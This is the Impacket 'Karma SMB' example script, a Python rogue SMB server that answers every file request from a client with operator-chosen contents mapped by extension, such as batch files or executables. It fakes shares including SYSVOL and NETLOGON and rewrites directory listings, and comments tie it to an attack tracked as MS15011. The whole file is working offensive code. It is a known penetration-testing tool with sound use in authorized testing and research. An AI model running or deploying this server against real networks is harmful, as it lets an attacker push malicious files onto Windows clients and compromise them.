#!/usr/bin/env python # Impacket - Collection of Python classes for working with network protocols. # # SECUREAUTH LABS. Copyright (C) 2018 SecureAuth Corporation. All rights reserved. # # This software is provided under a slightly modified version # of the Apache Software License. See the accompanying LICENSE file # for more information. # # Description: # Karma SMB # # The idea of this script is to answer any file read request # with a set of predefined contents based on the extension # asked, regardless of the sharename and/or path. # When executing this script w/o a config file the pathname # file contents will be sent for every request. # If a config file is specified, format should be this way: # = # for example: # bat = /tmp/batchfile # com = /tmp/comfile # exe = /tmp/exefile # # The SMB2 support works with a caveat. If two different # filenames at the same share are requested, the first # one will work and the second one will not work if the request # is performed right away. This seems related to the # QUERY_DIRECTORY request, where we return the files available. # In the first try, we return the file that was asked to open. # In the second try, the client will NOT ask for another # QUERY_DIRECTORY but will use the cached one. This time the new file # is not there, so the client assumes it doesn't exist. # After a few seconds, looks like the client cache is cleared and # the operation works again. Further research is needed trying # to avoid this from happening. # # SMB1 seems to be working fine on that scenario. # # Author: # Alberto Solino (@agsolino) # Original idea by @mubix # # ToDo: # [ ] A lot of testing needed under different OSes. # I'm still not sure how reliable this approach is. # [ ] Add support for other SMB read commands. Right now just # covering SMB_COM_NT_CREATE_ANDX # [ ] Disable write request, now if the client tries to copy # a file back to us, it will overwrite the files we're # hosting. *CAREFUL!!!* # from __future__ import division from __future__ import print_function import sys import os import argparse import logging import ntpath try: import ConfigParser except ImportError: import configparser as ConfigParser from threading import Thread from impacket.examples import logger from impacket import smbserver, smb, version import impacket.smb3structs as smb2 from impacket.smb import FILE_OVERWRITE, FILE_OVERWRITE_IF, FILE_WRITE_DATA, FILE_APPEND_DATA, GENERIC_WRITE from impacket.nt_errors import STATUS_USER_SESSION_DELETED, STATUS_SUCCESS, STATUS_ACCESS_DENIED, STATUS_NO_MORE_FILES, \ STATUS_OBJECT_PATH_NOT_FOUND from impacket.smbserver import SRVSServer, decodeSMBString, findFirst2, STATUS_SMB_BAD_TID, encodeSMBString, \ getFileTime, queryPathInformation class KarmaSMBServer(Thread): def __init__(self, smb2Support = False): Thread.__init__(self) self.server = 0 self.defaultFile = None self.extensions = {} # Here we write a mini config for the server smbConfig = ConfigParser.ConfigParser() smbConfig.add_section('global') smbConfig.set('global','server_name','server_name') smbConfig.set('global','server_os','UNIX') smbConfig.set('global','server_domain','WORKGROUP') smbConfig.set('global','log_file','smb.log') smbConfig.set('global','credentials_file','') # IPC always needed smbConfig.add_section('IPC$') smbConfig.set('IPC$','comment','Logon server share') smbConfig.set('IPC$','read only','yes') smbConfig.set('IPC$','share type','3') smbConfig.set('IPC$','path','') # NETLOGON always needed smbConfig.add_section('NETLOGON') smbConfig.set('NETLOGON','comment','Logon server share') smbConfig.set('NETLOGON','read only','no') smbConfig.set('NETLOGON','share type','0') smbConfig.set('NETLOGON','path','') # SYSVOL always needed smbConfig.add_section('SYSVOL') smbConfig.set('SYSVOL','comment','') smbConfig.set('SYSVOL','read only','no') smbConfig.set('SYSVOL','share type','0') smbConfig.set('SYSVOL','path','') if smb2Support: smbConfig.set("global", "SMB2Support", "True") self.server = smbserver.SMBSERVER(('',445), config_parser = smbConfig) self.server.processConfigFile() # Unregistering some dangerous and unwanted commands self.server.unregisterSmbCommand(smb.SMB.SMB_COM_CREATE_DIRECTORY) self.server.unregisterSmbCommand(smb.SMB.SMB_COM_DELETE_DIRECTORY) self.server.unregisterSmbCommand(smb.SMB.SMB_COM_RENAME) self.server.unregisterSmbCommand(smb.SMB.SMB_COM_DELETE) self.server.unregisterSmbCommand(smb.SMB.SMB_COM_WRITE) self.server.unregisterSmbCommand(smb.SMB.SMB_COM_WRITE_ANDX) self.server.unregisterSmb2Command(smb2.SMB2_WRITE) self.origsmbComNtCreateAndX = self.server.hookSmbCommand(smb.SMB.SMB_COM_NT_CREATE_ANDX, self.smbComNtCreateAndX) self.origsmbComTreeConnectAndX = self.server.hookSmbCommand(smb.SMB.SMB_COM_TREE_CONNECT_ANDX, self.smbComTreeConnectAndX) self.origQueryPathInformation = self.server.hookTransaction2(smb.SMB.TRANS2_QUERY_PATH_INFORMATION, self.queryPathInformation) self.origFindFirst2 = self.server.hookTransaction2(smb.SMB.TRANS2_FIND_FIRST2, self.findFirst2) # And the same for SMB2 self.origsmb2TreeConnect = self.server.hookSmb2Command(smb2.SMB2_TREE_CONNECT, self.smb2TreeConnect) self.origsmb2Create = self.server.hookSmb2Command(smb2.SMB2_CREATE, self.smb2Create) self.origsmb2QueryDirectory = self.server.hookSmb2Command(smb2.SMB2_QUERY_DIRECTORY, self.smb2QueryDirectory) self.origsmb2Read = self.server.hookSmb2Command(smb2.SMB2_READ, self.smb2Read) self.origsmb2Close = self.server.hookSmb2Command(smb2.SMB2_CLOSE, self.smb2Close) # Now we have to register the MS-SRVS server. This specially important for # Windows 7+ and Mavericks clients since they WON'T (specially OSX) # ask for shares using MS-RAP. self.__srvsServer = SRVSServer() self.__srvsServer.daemon = True self.server.registerNamedPipe('srvsvc',('',self.__srvsServer.getListenPort())) def findFirst2(self, connId, smbServer, recvPacket, parameters, data, maxDataCount): connData = smbServer.getConnectionData(connId) respSetup = b'' respParameters = b'' respData = b'' findFirst2Parameters = smb.SMBFindFirst2_Parameters( recvPacket['Flags2'], data = parameters) # 1. Let's grab the extension and map the file's contents we will deliver origPathName = os.path.normpath(decodeSMBString(recvPacket['Flags2'],findFirst2Parameters['FileName']).replace('\\','/')) origFileName = os.path.basename(origPathName) _, origPathNameExtension = os.path.splitext(origPathName) origPathNameExtension = origPathNameExtension.upper()[1:] if origPathNameExtension.upper() in self.extensions: targetFile = self.extensions[origPathNameExtension.upper()] else: targetFile = self.defaultFile if recvPacket['Tid'] in connData['ConnectedShares']: path = connData['ConnectedShares'][recvPacket['Tid']]['path'] # 2. We call the normal findFirst2 call, but with our targetFile searchResult, searchCount, errorCode = findFirst2(path, targetFile, findFirst2Parameters['InformationLevel'], findFirst2Parameters['SearchAttributes'], pktFlags = recvPacket['Flags2'] ) respParameters = smb.SMBFindFirst2Response_Parameters() endOfSearch = 1 sid = 0x80 # default SID searchCount = 0 totalData = 0 for i in enumerate(searchResult): #i[1].dump() try: # 3. And we restore the original filename requested ;) i[1]['FileName'] = encodeSMBString( flags = recvPacket['Flags2'], text = origFileName) except: pass data = i[1].getData() lenData = len(data) if (totalData+lenData) >= maxDataCount or (i[0]+1) > findFirst2Parameters['SearchCount']: # We gotta stop here and continue on a find_next2 endOfSearch = 0 # Simple way to generate a fid if len(connData['SIDs']) == 0: sid = 1 else: sid = list(connData['SIDs'].keys())[-1] + 1 # Store the remaining search results in the ConnData SID connData['SIDs'][sid] = searchResult[i[0]:] respParameters['LastNameOffset'] = totalData break else: searchCount +=1 respData += data totalData += lenData respParameters['SID'] = sid respParameters['EndOfSearch'] = endOfSearch respParameters['SearchCount'] = searchCount else: errorCode = STATUS_SMB_BAD_TID smbServer.setConnectionData(connId, connData) return respSetup, respParameters, respData, errorCode def smbComNtCreateAndX(self, connId, smbServer, SMBCommand, recvPacket): connData = smbServer.getConnectionData(connId) ntCreateAndXParameters = smb.SMBNtCreateAndX_Parameters(SMBCommand['Parameters']) ntCreateAndXData = smb.SMBNtCreateAndX_Data( flags = recvPacket['Flags2'], data = SMBCommand['Data']) respSMBCommand = smb.SMBCommand(smb.SMB.SMB_COM_NT_CREATE_ANDX) #ntCreateAndXParameters.dump() # Let's try to avoid allowing write requests from the client back to us # not 100% bulletproof, plus also the client might be using other SMB # calls (e.g. SMB_COM_WRITE) createOptions = ntCreateAndXParameters['CreateOptions'] if createOptions & smb.FILE_DELETE_ON_CLOSE == smb.FILE_DELETE_ON_CLOSE: errorCode = STATUS_ACCESS_DENIED elif ntCreateAndXParameters['Disposition'] & smb.FILE_OVERWRITE == FILE_OVERWRITE: errorCode = STATUS_ACCESS_DENIED elif ntCreateAndXParameters['Disposition'] & smb.FILE_OVERWRITE_IF == FILE_OVERWRITE_IF: errorCode = STATUS_ACCESS_DENIED elif ntCreateAndXParameters['AccessMask'] & smb.FILE_WRITE_DATA == FILE_WRITE_DATA: errorCode = STATUS_ACCESS_DENIED elif ntCreateAndXParameters['AccessMask'] & smb.FILE_APPEND_DATA == FILE_APPEND_DATA: errorCode = STATUS_ACCESS_DENIED elif ntCreateAndXParameters['AccessMask'] & smb.GENERIC_WRITE == GENERIC_WRITE: errorCode = STATUS_ACCESS_DENIED elif ntCreateAndXParameters['AccessMask'] & 0x10000 == 0x10000: errorCode = STATUS_ACCESS_DENIED else: errorCode = STATUS_SUCCESS if errorCode == STATUS_ACCESS_DENIED: return [respSMBCommand], None, errorCode # 1. Let's grab the extension and map the file's contents we will deliver origPathName = os.path.normpath(decodeSMBString(recvPacket['Flags2'],ntCreateAndXData['FileName']).replace('\\','/')) _, origPathNameExtension = os.path.splitext(origPathName) origPathNameExtension = origPathNameExtension.upper()[1:] if origPathNameExtension.upper() in self.extensions: targetFile = self.extensions[origPathNameExtension.upper()] else: targetFile = self.defaultFile # 2. We change the filename in the request for our targetFile ntCreateAndXData['FileName'] = encodeSMBString( flags = recvPacket['Flags2'], text = targetFile) SMBCommand['Data'] = ntCreateAndXData.getData() smbServer.log("%s is asking for %s. Delivering %s" % (connData['ClientIP'], origPathName,targetFile),logging.INFO) # 3. We call the original call with our modified data return self.origsmbComNtCreateAndX(connId, smbServer, SMBCommand, recvPacket) def queryPathInformation(self, connId, smbServer, recvPacket, parameters, data, maxDataCount = 0): # The trick we play here is that Windows clients first ask for the file # and then it asks for the directory containing the file. # It is important to answer the right questions for the attack to work connData = smbServer.getConnectionData(connId) respSetup = b'' respParameters = b'' respData = b'' errorCode = 0 queryPathInfoParameters = smb.SMBQueryPathInformation_Parameters(flags = recvPacket['Flags2'], data = parameters) if recvPacket['Tid'] in connData['ConnectedShares']: path = '' try: origPathName = decodeSMBString(recvPacket['Flags2'], queryPathInfoParameters['FileName']) origPathName = os.path.normpath(origPathName.replace('\\','/')) if ('MS15011' in connData) is False: connData['MS15011'] = {} smbServer.log("Client is asking for QueryPathInformation for: %s" % origPathName,logging.INFO) if origPathName in connData['MS15011'] or origPathName == '.': # We already processed this entry, now it's asking for a directory infoRecord, errorCode = queryPathInformation(path, '/', queryPathInfoParameters['InformationLevel']) else: # First time asked, asking for the file infoRecord, errorCode = queryPathInformation(path, self.defaultFile, queryPathInfoParameters['InformationLevel']) connData['MS15011'][os.path.dirname(origPathName)] = infoRecord except Exception as e: #import traceback #traceback.print_exc() smbServer.log("queryPathInformation: %s" % e,logging.ERROR) if infoRecord is not None: respParameters = smb.SMBQueryPathInformationResponse_Parameters() respData = infoRecord else: errorCode = STATUS_SMB_BAD_TID smbServer.setConnectionData(connId, connData) return respSetup, respParameters, respData, errorCode def smb2Read(self, connId, smbServer, recvPacket): connData = smbServer.getConnectionData(connId) connData['MS15011']['StopConnection'] = True smbServer.setConnectionData(connId, connData) return self.origsmb2Read(connId, smbServer, recvPacket) def smb2Close(self, connId, smbServer, recvPacket): connData = smbServer.getConnectionData(connId) # We're closing the connection trying to flush the client's # cache. if connData['MS15011']['StopConnection'] is True: return [smb2.SMB2Error()], None, STATUS_USER_SESSION_DELETED return self.origsmb2Close(connId, smbServer, recvPacket) def smb2Create(self, connId, smbServer, recvPacket): connData = smbServer.getConnectionData(connId) ntCreateRequest = smb2.SMB2Create(recvPacket['Data']) # Let's try to avoid allowing write requests from the client back to us # not 100% bulletproof, plus also the client might be using other SMB # calls createOptions = ntCreateRequest['CreateOptions'] if createOptions & smb2.FILE_DELETE_ON_CLOSE == smb2.FILE_DELETE_ON_CLOSE: errorCode = STATUS_ACCESS_DENIED elif ntCreateRequest['CreateDisposition'] & smb2.FILE_OVERWRITE == smb2.FILE_OVERWRITE: errorCode = STATUS_ACCESS_DENIED elif ntCreateRequest['CreateDisposition'] & smb2.FILE_OVERWRITE_IF == smb2.FILE_OVERWRITE_IF: errorCode = STATUS_ACCESS_DENIED elif ntCreateRequest['DesiredAccess'] & smb2.FILE_WRITE_DATA == smb2.FILE_WRITE_DATA: errorCode = STATUS_ACCESS_DENIED elif ntCreateRequest['DesiredAccess'] & smb2.FILE_APPEND_DATA == smb2.FILE_APPEND_DATA: errorCode = STATUS_ACCESS_DENIED elif ntCreateRequest['DesiredAccess'] & smb2.GENERIC_WRITE == smb2.GENERIC_WRITE: errorCode = STATUS_ACCESS_DENIED elif ntCreateRequest['DesiredAccess'] & 0x10000 == 0x10000: errorCode = STATUS_ACCESS_DENIED else: errorCode = STATUS_SUCCESS if errorCode == STATUS_ACCESS_DENIED: return [smb2.SMB2Error()], None, errorCode # 1. Let's grab the extension and map the file's contents we will deliver origPathName = os.path.normpath(ntCreateRequest['Buffer'][:ntCreateRequest['NameLength']].decode('utf-16le').replace('\\','/')) _, origPathNameExtension = os.path.splitext(origPathName) origPathNameExtension = origPathNameExtension.upper()[1:] # Are we being asked for a directory? if (createOptions & smb2.FILE_DIRECTORY_FILE) == 0: if origPathNameExtension.upper() in self.extensions: targetFile = self.extensions[origPathNameExtension.upper()] else: targetFile = self.defaultFile connData['MS15011']['FileData'] = (os.path.basename(origPathName), targetFile) smbServer.log("%s is asking for %s. Delivering %s" % (connData['ClientIP'], origPathName,targetFile),logging.INFO) else: targetFile = '/' # 2. We change the filename in the request for our targetFile try: ntCreateRequest['Buffer'] = targetFile.encode('utf-16le') except UnicodeDecodeError: import sys ntCreateRequest['Buffer'] = targetFile.decode(sys.getfilesystemencoding()).encode('utf-16le') ntCreateRequest['NameLength'] = len(targetFile)*2 recvPacket['Data'] = ntCreateRequest.getData() # 3. We call the original call with our modified data return self.origsmb2Create(connId, smbServer, recvPacket) def smb2QueryDirectory(self, connId, smbServer, recvPacket): # Windows clients with SMB2 will also perform a QueryDirectory # expecting to get the filename asked. So we deliver it :) connData = smbServer.getConnectionData(connId) respSMBCommand = smb2.SMB2QueryDirectory_Response() #queryDirectoryRequest = smb2.SMB2QueryDirectory(recvPacket['Data']) errorCode = 0xff respSMBCommand['Buffer'] = b'\x00' errorCode = STATUS_SUCCESS #if (queryDirectoryRequest['Flags'] & smb2.SL_RETURN_SINGLE_ENTRY) == 0: # return [smb2.SMB2Error()], None, STATUS_NOT_SUPPORTED if connData['MS15011']['FindDone'] is True: connData['MS15011']['FindDone'] = False smbServer.setConnectionData(connId, connData) return [smb2.SMB2Error()], None, STATUS_NO_MORE_FILES else: origName, targetFile = connData['MS15011']['FileData'] (mode, ino, dev, nlink, uid, gid, size, atime, mtime, ctime) = os.stat(targetFile) infoRecord = smb.SMBFindFileIdBothDirectoryInfo( smb.SMB.FLAGS2_UNICODE ) infoRecord['ExtFileAttributes'] = smb.ATTR_NORMAL | smb.ATTR_ARCHIVE infoRecord['EaSize'] = 0 infoRecord['EndOfFile'] = size infoRecord['AllocationSize'] = size infoRecord['CreationTime'] = getFileTime(ctime) infoRecord['LastAccessTime'] = getFileTime(atime) infoRecord['LastWriteTime'] = getFileTime(mtime) infoRecord['LastChangeTime'] = getFileTime(mtime) infoRecord['ShortName'] = b'\x00'*24 #infoRecord['FileName'] = os.path.basename(origName).encode('utf-16le') infoRecord['FileName'] = origName.encode('utf-16le') padLen = (8-(len(infoRecord) % 8)) % 8 infoRecord['NextEntryOffset'] = 0 respSMBCommand['OutputBufferOffset'] = 0x48 respSMBCommand['OutputBufferLength'] = len(infoRecord.getData()) respSMBCommand['Buffer'] = infoRecord.getData() + b'\xaa'*padLen connData['MS15011']['FindDone'] = True smbServer.setConnectionData(connId, connData) return [respSMBCommand], None, errorCode def smb2TreeConnect(self, connId, smbServer, recvPacket): connData = smbServer.getConnectionData(connId) respPacket = smb2.SMB2Packet() respPacket['Flags'] = smb2.SMB2_FLAGS_SERVER_TO_REDIR respPacket['Status'] = STATUS_SUCCESS respPacket['CreditRequestResponse'] = 1 respPacket['Command'] = recvPacket['Command'] respPacket['SessionID'] = connData['Uid'] respPacket['Reserved'] = recvPacket['Reserved'] respPacket['MessageID'] = recvPacket['MessageID'] respPacket['TreeID'] = recvPacket['TreeID'] respSMBCommand = smb2.SMB2TreeConnect_Response() treeConnectRequest = smb2.SMB2TreeConnect(recvPacket['Data']) errorCode = STATUS_SUCCESS ## Process here the request, does the share exist? path = recvPacket.getData()[treeConnectRequest['PathOffset']:][:treeConnectRequest['PathLength']] UNCOrShare = path.decode('utf-16le') # Is this a UNC? if ntpath.ismount(UNCOrShare): path = UNCOrShare.split('\\')[3] else: path = ntpath.basename(UNCOrShare) # We won't search for the share.. all of them exist :P #share = searchShare(connId, path.upper(), smbServer) connData['MS15011'] = {} connData['MS15011']['FindDone'] = False connData['MS15011']['StopConnection'] = False share = {} if share is not None: # Simple way to generate a Tid if len(connData['ConnectedShares']) == 0: tid = 1 else: tid = list(connData['ConnectedShares'].keys())[-1] + 1 connData['ConnectedShares'][tid] = share connData['ConnectedShares'][tid]['path'] = '/' connData['ConnectedShares'][tid]['shareName'] = path respPacket['TreeID'] = tid #smbServer.log("Connecting Share(%d:%s)" % (tid,path)) else: smbServer.log("SMB2_TREE_CONNECT not found %s" % path, logging.ERROR) errorCode = STATUS_OBJECT_PATH_NOT_FOUND respPacket['Status'] = errorCode ## if path == 'IPC$': respSMBCommand['ShareType'] = smb2.SMB2_SHARE_TYPE_PIPE respSMBCommand['ShareFlags'] = 0x30 else: respSMBCommand['ShareType'] = smb2.SMB2_SHARE_TYPE_DISK respSMBCommand['ShareFlags'] = 0x0 respSMBCommand['Capabilities'] = 0 respSMBCommand['MaximalAccess'] = 0x011f01ff respPacket['Data'] = respSMBCommand smbServer.setConnectionData(connId, connData) return None, [respPacket], errorCode def smbComTreeConnectAndX(self, connId, smbServer, SMBCommand, recvPacket): connData = smbServer.getConnectionData(connId) resp = smb.NewSMBPacket() resp['Flags1'] = smb.SMB.FLAGS1_REPLY resp['Flags2'] = smb.SMB.FLAGS2_EXTENDED_SECURITY | smb.SMB.FLAGS2_NT_STATUS | smb.SMB.FLAGS2_LONG_NAMES | \ recvPacket['Flags2'] & smb.SMB.FLAGS2_UNICODE resp['Tid'] = recvPacket['Tid'] resp['Mid'] = recvPacket['Mid'] resp['Pid'] = connData['Pid'] respSMBCommand = smb.SMBCommand(smb.SMB.SMB_COM_TREE_CONNECT_ANDX) respParameters = smb.SMBTreeConnectAndXResponse_Parameters() respData = smb.SMBTreeConnectAndXResponse_Data() treeConnectAndXParameters = smb.SMBTreeConnectAndX_Parameters(SMBCommand['Parameters']) if treeConnectAndXParameters['Flags'] & 0x8: respParameters = smb.SMBTreeConnectAndXExtendedResponse_Parameters() treeConnectAndXData = smb.SMBTreeConnectAndX_Data( flags = recvPacket['Flags2'] ) treeConnectAndXData['_PasswordLength'] = treeConnectAndXParameters['PasswordLength'] treeConnectAndXData.fromString(SMBCommand['Data']) errorCode = STATUS_SUCCESS UNCOrShare = decodeSMBString(recvPacket['Flags2'], treeConnectAndXData['Path']) # Is this a UNC? if ntpath.ismount(UNCOrShare): path = UNCOrShare.split('\\')[3] else: path = ntpath.basename(UNCOrShare) # We won't search for the share.. all of them exist :P smbServer.log("TreeConnectAndX request for %s" % path, logging.INFO) #share = searchShare(connId, path, smbServer) share = {} # Simple way to generate a Tid if len(connData['ConnectedShares']) == 0: tid = 1 else: tid = list(connData['ConnectedShares'].keys())[-1] + 1 connData['ConnectedShares'][tid] = share connData['ConnectedShares'][tid]['path'] = '/' connData['ConnectedShares'][tid]['shareName'] = path resp['Tid'] = tid #smbServer.log("Connecting Share(%d:%s)" % (tid,path)) respParameters['OptionalSupport'] = smb.SMB.SMB_SUPPORT_SEARCH_BITS if path == 'IPC$': respData['Service'] = 'IPC' else: respData['Service'] = path respData['PadLen'] = 0 respData['NativeFileSystem'] = encodeSMBString(recvPacket['Flags2'], 'NTFS' ).decode() respSMBCommand['Parameters'] = respParameters respSMBCommand['Data'] = respData resp['Uid'] = connData['Uid'] resp.addCommand(respSMBCommand) smbServer.setConnectionData(connId, connData) return None, [resp], errorCode def _start(self): self.server.serve_forever() def run(self): logging.info("Setting up SMB Server") self._start() def setDefaultFile(self, filename): self.defaultFile = filename def setExtensionsConfig(self, filename): for line in filename.readlines(): line = line.strip('\r\n ') if line.startswith('#') is not True and len(line) > 0: extension, pathName = line.split('=') self.extensions[extension.strip().upper()] = os.path.normpath(pathName.strip()) # Process command-line arguments. if __name__ == '__main__': # Init the example's logger theme logger.init() print(version.BANNER) parser = argparse.ArgumentParser(add_help = False, description = "For every file request received, this module will " "return the pathname contents") parser.add_argument("--help", action="help", help='show this help message and exit') parser.add_argument('fileName', action='store', metavar = 'pathname', help="Pathname's contents to deliver to SMB " "clients") parser.add_argument('-config', type=argparse.FileType('r'), metavar = 'pathname', help='config file name to map ' 'extensions to files to deliver. For those extensions not present, pathname will be delivered') parser.add_argument('-smb2support', action='store_true', default=False, help='SMB2 Support (experimental!)') if len(sys.argv)==1: parser.print_help() sys.exit(1) try: options = parser.parse_args() except Exception as e: logging.critical(str(e)) sys.exit(1) s = KarmaSMBServer(options.smb2support) s.setDefaultFile(os.path.normpath(options.fileName)) if options.config is not None: s.setExtensionsConfig(options.config) s.start() logging.info("Servers started, waiting for connections") while True: try: sys.stdin.read() except KeyboardInterrupt: sys.exit(1) else: pass